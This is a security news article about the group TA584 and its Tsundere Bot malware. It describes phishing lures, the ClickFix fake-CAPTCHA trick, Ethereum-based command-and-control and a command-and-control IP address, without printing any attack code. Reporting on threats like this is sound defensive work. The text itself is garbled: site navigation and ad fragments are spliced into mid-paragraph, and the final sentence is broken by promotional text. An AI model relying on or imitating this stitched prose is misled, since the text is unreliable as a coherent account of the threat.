Using dishonest social engineering techniques, a sophisticated cybercriminal group known as TA584 has added a new malware known as Tsundere Bot to its arsenal of attack tools This article explores tsundere bot malware. . This threat actor, tracked as an initial access broker, has significantly intensified operations throughout 2025, with campaign volumes tripling between March and December. Learn more about the Zero Trust Network Obtain solutions Features of the security author Cybersecurity Software for endpoint detection and response Cloud computing is fed by threat intelligence. Services for penetration testing Malware in Windows security software Through skillfully constructed phishing emails that pose as reputable companies and governmental organizations, the malware targets businesses all over the world and deceives victims into carrying out harmful commands. TA584 is incredibly quick and flexible, launching several campaigns at once while continuously changing its infrastructure, delivery methods, and lures. The threat actor uses compromised accounts to send seemingly authentic emails with unique URLs that are intended to evade security filters through IP verification and geofencing. To gain credibility with potential targets, these messages frequently pose as government agencies, business services, recruiting firms, and healthcare facilities. Tsundere Bot is a malware-as-a-service platform that was initially provided by TA584 in late November 2025, according to Proofpoint analysts. The malware, which combines sophisticated evasion techniques with backdoor capabilities, represents a worrying evolution in threat delivery. Lure posing as a recruiting agency (Source: Proofpoint) Early campaign analysis showed that ransomware deployment could result from infections, putting enterprise networks at serious risk. The threat actor’s operational consistency since 2020, combined with connections to Russian cybercriminal markets, underscores the organized and persistent nature of these attacks. Learn more about macOS security apps Cyber tools for digital forensics Apps for secure messaging Data security software Safe web hosting Guide to Hacker Tools Software for vulnerability scanning Feeds of threat intelligence Plugin for WordPress security The malware sets itself apart by utilizing blockchain technology for command-and-control communications, taking advantage of the Ethereum network through a method known as EtherHiding. By retrieving configuration data from Web3 smart contracts, this method greatly increases the difficulty of detection and disruption for security teams. The malware uses PowerShell scripts created from its control panel to automatically install Node.js, which is a prerequisite for Tsundere Bot. ClickFix Mechanism for Social Engineering To trick victims into running malicious PowerShell commands on their own computers, TA584 uses the ClickFix technique. Recipients come across a phony CAPTCHA verification page after clicking embedded URLs and going through several verification layers. CAPTCHA with an HSE theme (Source: Proofpoint) Users are shown fake error messages after completing the CAPTCHA, instructing them to copy and paste particular commands into Windows Run dialog boxes. ClickFix procedures (Source: Proofpoint) By following these instructions, victims unintentionally run a PowerShell command that downloads and launches a remote script from infrastructure under the control of the attacker. PowerShell script for TA584 (Source: Proofpoint) This intermediate script installs Node.js and its dependencies directly from legitimate sources, then decrypts two AES-encrypted Node.js files embedded within the payload. The second file, which contains Tsundere Bot itself, is executed after the first file acts as a loader. Multiple anti-analysis features are incorporated into the infection chain, such as IP-based restrictions that prohibit security researchers from retrieving payloads unless they access from the same address that viewed the landing page. Once installed, Tsundere Bot connects to its command-and-control server at 193.17.183.126:3001, transmitting system profiling information and awaiting further instructions. LinkedIn, X to Get More Instant Updates, Set CSN as a Preferred Source in Google, and operational boundaries consistent with Russian cybercriminal conventions are suggested by the malware's geographic restrictions that prohibit execution on systems using CIS country languages.